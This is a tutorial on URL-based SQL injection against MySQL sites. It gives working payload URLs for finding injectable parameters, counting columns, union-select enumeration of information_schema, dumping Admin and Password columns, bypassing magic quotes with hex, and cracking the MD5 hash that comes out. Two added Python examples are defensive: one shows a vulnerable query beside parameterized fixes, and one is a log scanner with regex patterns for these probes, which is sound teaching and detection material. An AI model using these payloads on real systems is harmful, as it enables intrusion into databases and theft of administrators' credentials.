Advance SQL Injection : Url Based
The first thing we have to figure out is, ‘when is a site vulnerable to SQL injection or not?’
We can do this a few ways, depending on what kind of SQL injection types we know.
Some examples for how to figure out if it’s vulnerable or not to basic SQLi:
· Place a single quote (') after the last part of the URL.
If you get something similar to the following errors:
· You have an error in your SQL syntax
· Warning: mysql_fetch_array():
· Warning: mysql_fetch_assoc():
· Warning: mysql_numrows():
· Warning: mysql_num_rows():
· Warning: mysql_result():
· Warning: mysql_preg_match():
Or anything similar to this, it IS vulnerable to SQL injection; about 95% of the time you will see these common errors.
· There are more ways to tell if it’s vulnerable, even if it doesn’t throw an error on simple SQL injection attempts: check whether images or other content are missing from the page. Sometimes when the SQL query errors out the page is unable to load certain images and they won’t show. A page that is missing text, or displays less than before, is another good sign that it is vulnerable.
So keep your eyes open to see if your target is SQL injectable.
Exploiting a simple SQL vulnerability.
As this covers the first part, you will always want to start off with the most absolute BASIC of SQLi.
Ways of exploiting common SQL injection points:
· Find out if it’s vulnerable (see Chapter 1)
Next what we want to do is know how many columns we are working with on their current database to extract information that we want.
There are multiple ways to check how many columns there are for SIMPLE SQL injection.
1. Order by
2. Procedure analyze
3. Group by
· Example: if we use group by with a number that is too high, the error will state: Unknown column “21” in group count. If it is the right number of columns it will instead return: Can’t group on “count”
Order by will work as follows, let’s say we have a vulnerable site that has 20 columns.
www.site.com/view.php?id=25 order by 19-- will show the page, still no errors.
www.site.com/view.php?id=25 order by 20-- will still show the page.
www.site.com/view.php?id=25 order by 21-- can give multiple errors like:
· Unknown column “21” in ‘order’ clause
Now that we figured out how many columns our target has, we can start exploiting it.
We want to explore which number(s) are showing up on the page.
We will do that by the following query:
www.site.com/view.php?id=25 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
With the query we just entered, numbers may or may not pop up on the page. If none pop up, the first thing we will do is check the source of the page and search for numbers. If you’re not certain whether a number comes from the website itself or from our query, do the following:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
We are telling the server that 1 equals 0, which is false, so the original part of the query returns no rows and only the rows from our union select are displayed; in 90% of cases it will now show your column numbers.
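The two tricks above (counting columns with order by, then making the original row disappear with and 1=0 so the union rows show) both depend on the id parameter being spliced straight into the SQL text. The following Python example is added here and is not code from the original page: it rebuilds that pattern against a constructed in-memory SQLite table (named articles, with one sample row, both assumptions of this example; SQLite is used instead of MySQL because it runs offline with no server) and places it beside two hardened versions, one that binds the value with a placeholder and one that also validates its shape.

```python
import sqlite3


def make_demo_db():
    # Constructed sample data for this example; the table and row are not from the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO articles VALUES (25, 'Welcome', 'Hello world')")
    db.commit()
    return db


def fetch_article_vulnerable(db, raw_id):
    # Mirrors the pattern behind view.php?id=...: the raw parameter is spliced into
    # the SQL text, so anything after the number ("order by 21",
    # "and 1=0 union all select ...") becomes part of the statement.
    sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
    return db.execute(sql).fetchall()


def vulnerable_probe_outcome(db, raw_id):
    # Shows why the order by trick leaks the column count: a term beyond the
    # number of selected columns raises a database error, which the vulnerable
    # page would turn into the visible error messages listed above.
    try:
        fetch_article_vulnerable(db, raw_id)
        return "page renders"
    except sqlite3.OperationalError as exc:
        return "error: " + str(exc)


def fetch_article_bound(db, raw_id):
    # Hardened form 1: the value is bound through a placeholder. The driver sends
    # the whole string as a value, never as SQL, so "25 and 1=0 union all select ..."
    # simply matches no row instead of being executed.
    return db.execute("SELECT id, title, body FROM articles WHERE id=?", (raw_id,)).fetchall()


def fetch_article_validated(db, raw_id):
    # Hardened form 2: on top of binding, reject anything that is not the shape the
    # application expects (a decimal id), so a probe never reaches the database.
    if not raw_id.isdigit():
        raise ValueError("id must be a decimal integer")
    return fetch_article_bound(db, int(raw_id))


if __name__ == "__main__":
    db = make_demo_db()
    probe = "25 and 1=0 union all select 1,2,3"
    print("vulnerable:", fetch_article_vulnerable(db, probe))   # the injected row (1, 2, 3)
    print("order by 4:", vulnerable_probe_outcome(db, "25 order by 4"))
    print("bound:     ", fetch_article_bound(db, probe))        # no rows
    try:
        fetch_article_validated(db, probe)
    except ValueError as exc:
        print("validated: rejected,", exc)
```

Binding alone already neutralises the injection; the validation step is defence in depth that also keeps the database error messages (the detection signal this page relies on) from ever being produced.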
Now that you found the column numbers on the page itself, pick a number which you find the easiest to see / find on the website (that pops out of the page at you).
Let’s say in this example the MySQL version they are running is 5.
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
This query will show us the exact version of MySQL they are running, which is fairly important, since MySQL mostly comes in 2 flavours, version 4 or 5 (yes, there are lower versions, but finding those is like finding a needle in a haystack). A quick explanation: MySQL 4 has no information_schema database. Therefore you either have to guess table / column names, or brute force them with a wordlist or something similar.
Now to exploit our site:
We need to know what tables our target database has, for that query we can use information_schema 90% of the time (unless you’re on MySQL 4), to do so we use the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables--
In this query we used concat, a SQL function that “concatenates” (joins together) the values it is given from the tables / columns we select.
We have the following functions to grab all the data from either a table or column:
1. Concat
2. Concat_ws
· Concat_ws stands for concat with separator, and is used as follows:
Concat_ws(':',username,password) – this function puts our separator, the : sign, between every column / table we select.
3. Group_concat
· Group_concat will return all strings within a certain group.
Running this query may show all of the table names from a certain database, or just 1 of them, or a really big mess.
Therefore we will change the query to make sure we can view it as best as possible:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(':',table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables--
Which results in showing the table names with a little separator sign, therefore easier to read.
What if you CAN’T view all of the tables? There are a few tricks for this:
1. Limit (Limit does what it says and limits the result to what the user requests). To use it we add LIMIT 1,1-- at the end of the query we did. This will show your table names 1 by 1, and can be used for any table / column or data you try it on. By increasing the first number to 2,1 3,1 4,1 etc. we will see the table / column / data that’s on the 2nd row or later.
Now that we know our table names, you might find something like users, or maybe admin. Now we want to see all the columns within that table, which we do with the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(':',column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name='admin'--
What we did here is request all the columns in the admin table from information_schema, as that holds an internal map of the database (tables / columns etc.)
Doing it like this might give you an error because of the PHP settings on the server (hosting admin): if magic quotes is on, we will need hex encoding to bypass it.
What we need:
We simply put in the name of the table we want, which was ‘admin’ in the example.
Which will output for us: 61646d696e
However, for this to work 100% we need to add 0x before our hex digits, which results in this query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(':',column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x61646d696e--
Now that it’s showing all of the information from the table, and we know which columns we are working with, we want to get to the data they store!
In my example we will use the following:
ID – Admin – Name – Fullname – Password – Email
As you can see, we want certain info from that table; personally I would go for Admin and Password, which we obtain with the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(':',Admin,Password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from Admin--
Which tells the server that we are requesting the data stored in the ‘Admin’ table, outputting something similar to this:
Admin: 21232f297a57a5a743894a0e4a801fc3
Some of you might be confused now, but the password is hashed with MD5, therefore we can use either public or private MD5 crackers, either online or as programs. I will show you 1 of my favorite websites to crack with:
If we entered the hash we will see that our Administrators information is:
Username: Admin – Password: admin
Now to get further in, you will need to scan the website or guess to find the admin panel. HINT: some websites have older databases that are no longer in use, so the password MIGHT not always work.
Tips & Tricks making your numbers visible:
1. 1=0
2. 1=2
3. DIV by 0
4. 99999999
5. Using the - (minus) sign before the number
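Every step on this page leaves a distinctive trace in the web server access log: a stray quote, order by followed by a number, union all select, and 1=0, information_schema, concat_ws / group_concat, a 0x hex literal and a trailing -- comment. The following Python example is added here and is not code from the original page: it parses constructed Apache-style log lines (the addresses, paths and timestamps are made up for this example), URL-decodes the request target and reports which of those indicators each line matches, so the probing sequence described above can be spotted from the defender's side. The indicator names are labels chosen for this example.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns for the probes described on this page, applied to the
# URL-decoded request target. The names are hypothetical labels for this example.
SQLI_INDICATORS = {
    "quote_probe":     re.compile(r"=[^&]*'"),                                   # id=25'
    "order_by_probe":  re.compile(r"\border\s+by\s+\d+", re.I),                  # order by 21
    "union_select":    re.compile(r"\bunion(\s+all)?\s+select\b", re.I),         # union all select
    "false_condition": re.compile(r"\b(and|or)\s+1\s*=\s*(0|2)\b", re.I),        # and 1=0 / 1=2
    "schema_lookup":   re.compile(r"\binformation_schema\.", re.I),              # information_schema.tables
    "concat_function": re.compile(r"\b(group_concat|concat_ws|concat)\s*\(", re.I),
    "hex_literal":     re.compile(r"\b0x[0-9a-f]+\b", re.I),                     # 0x61646d696e
    "sql_comment":     re.compile(r"--\s*$"),                                    # trailing --
}

# Request line inside an Apache combined-format entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /view.php?id=25 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /view.php?id=25%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:51 +0000] "GET /view.php?id=25%20order%20by%2021-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /view.php?id=25%20and%201=0%20union%20all%20select%201,2,3,4,concat_ws(0x3a,table_name),6%20from%20information_schema.tables-- HTTP/1.1" 200 6010 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:13:56:10 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def decoded_target(log_line):
    # Pull the request target out of the log entry and undo URL encoding, so that
    # %20 / %27 / + do not hide the keywords from the patterns.
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    return unquote_plus(m.group("target"))


def sqli_indicators(log_line):
    # Return the names of every indicator that matches this line (empty list if none).
    target = decoded_target(log_line)
    if target is None:
        return []
    return [name for name, rx in SQLI_INDICATORS.items() if rx.search(target)]


def scan_log(lines):
    # Return (line number, indicators) for each line that matched at least one pattern.
    hits = []
    for number, line in enumerate(lines, 1):
        found = sqli_indicators(line)
        if found:
            hits.append((number, found))
    return hits


if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```

The fifth sample line ("order by date" in a search box) matches nothing, because the order by pattern insists on a numeric term; in practice the strongest signal is a single client producing several different indicators in quick succession, together with the 500 responses the error-based checks above provoke.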